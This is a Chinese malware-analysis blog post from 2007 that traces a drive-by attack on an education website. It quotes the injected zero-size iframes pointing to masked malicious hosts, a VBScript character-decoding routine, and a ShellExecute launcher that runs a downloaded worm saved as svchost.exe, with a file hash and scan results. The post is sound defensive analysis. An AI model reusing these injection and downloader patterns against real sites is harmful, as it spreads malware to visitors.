某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码

endurer 原创
2007-03-26 第1版

该网首页末被加入代码：
/---
＜iframe src＝"hxxp://w**.q**b*b****d.com/b**d*.htm?001" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://www.m*m***ju**.net/bbs/t***j*.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞＜iframe src＝"hxxp://www.m*m***ju**.net/bbs/t***j*.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞＜iframe src＝%68%74%74%70%3A%2F%2F%6*A%*2*E%74%6*8**%6*5%63%2E%6*3%6*E%2*F%7*7%77%6B%6*C%2F/%31%2*E%68*%74%6D width＝0 height＝0＞＜/iframe＞
---/

hxxp://www.m*m***ju**.net/bbs/t***j*.htm 包含代码：
/---
＜iframe src="hxxp://w.qbbd.com/bd.htm?001" width="0" height="0" frameborder="0"＞＜/iframe＞
---/

hxxp://w**.q**b*b****d.com/b**d*.htm?001 包含代码：
/---
＜iframe src＝"hxxp://w**.q**b*b****d.com/0.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

hxxp://w**.q**b*b****d.com/0.htm （瑞星网页监控报为：Trojan.DL.VBS.Agent.clo）包含VBScript脚本代码，功能是用自定义函数：

function rechange(k)
s＝Split(k,",")
t＝""
For i ＝ 0 To UBound(s)
t＝t+Chr(eval(s(i)))
Next
rechange＝t
End Function

解密变量t的值并执行。

变量t解密后的值为VBScript脚本代码，功能是 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 0.exe，保存为 %temp%/svchost.exe，并创建内容为
/---
Set Shell ＝ Shell.Application
Shell.ShellExecute %temp%/svchost.exe "","","","open",0
---/
的文件svchost.vbs，通过Shell.Application 对象 的 ShellExecute 方法 来运行svchost.vbs，从而让%temp%/svchost.exe得已运行。

文件说明符 : D:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-26 20:40:47
修改时间 : 2007-3-26 20:41:0
访问时间 : 2007-3-26 0:0:0
大小 : 69037 字节 67.429 KB
MD5 : 35ecfe1014702d38a40a0b428679c06a

Scanned file: 0.rar - Infected

0.rar/0.exe - infected by Worm.Win32.Viking.jr

Statistics:

Known viruses:	285996	Updated:	26-03-2007
File size (Kb):	64	Virus bodies:	1
Files:	1	Warnings:	0
Archives:	1	Suspicious:	0

%68%74%74%70%3A%2F%2F%6*A%*2*E%74%6*8**%6*5%63%2E%6*3%6*E%2*F%7*7%77%6B%6*C%2F/%31%2*E%68*%74%6D即hxxp://j**.t**h*e***c.cn/w**w*k***l//1.htm
包含Javascript脚本代码，功能是用unescape解密并输出变量Words的值，Words解密后的值包含信息：＜!-- vml'exploit! --＞ 和shellcode 代码……